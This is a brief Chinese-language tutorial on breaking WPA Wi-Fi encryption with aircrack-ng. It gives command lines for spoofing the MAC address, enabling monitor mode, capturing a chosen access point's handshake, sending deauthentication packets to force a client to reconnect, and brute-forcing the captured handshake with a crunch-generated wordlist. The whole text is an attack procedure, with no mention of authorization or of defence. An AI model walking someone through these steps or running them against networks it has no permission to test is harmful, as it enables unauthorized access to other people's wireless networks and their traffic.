aircrack-ng暴力破解wpa加密

先将网卡down了,修改网卡mac地址

修改网卡mac地址macchanger –mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0 //开启指定网卡监听模式

 

airodump-ng wlan0mon //airodump-ng 扫描附近wifi

airodump-ng -c 11 -w wpa –bssid 00:13:EF:F1:01:8E wlan0mon //使用airodump-ng捕捉指定bssid的数据包

aireplay-ng -0 1 -a 00:13:EF:F1:01:8E -c FC:1A:11:A2:31:F3 wlan0mon //使用aireplay-ng命令,使ap与客户端解除关联,重新建立关联

-01:表示使用deauth攻击模式,后面的1指的是攻击次数,用户根据自己的情况可以指定不同的值

-a:指定ap的mac地址

-c:指定客户端的mac地址

停止捕捉数据包,并使用crunch生成字典文件,使用aircrack-ng -w dir.txt wpa-01.cap 破解抓取到的数据包

 

破解出密码

 

也可以不生成字典文件由crunch生成字典通过管道符,aircrack-ng调用

获得密码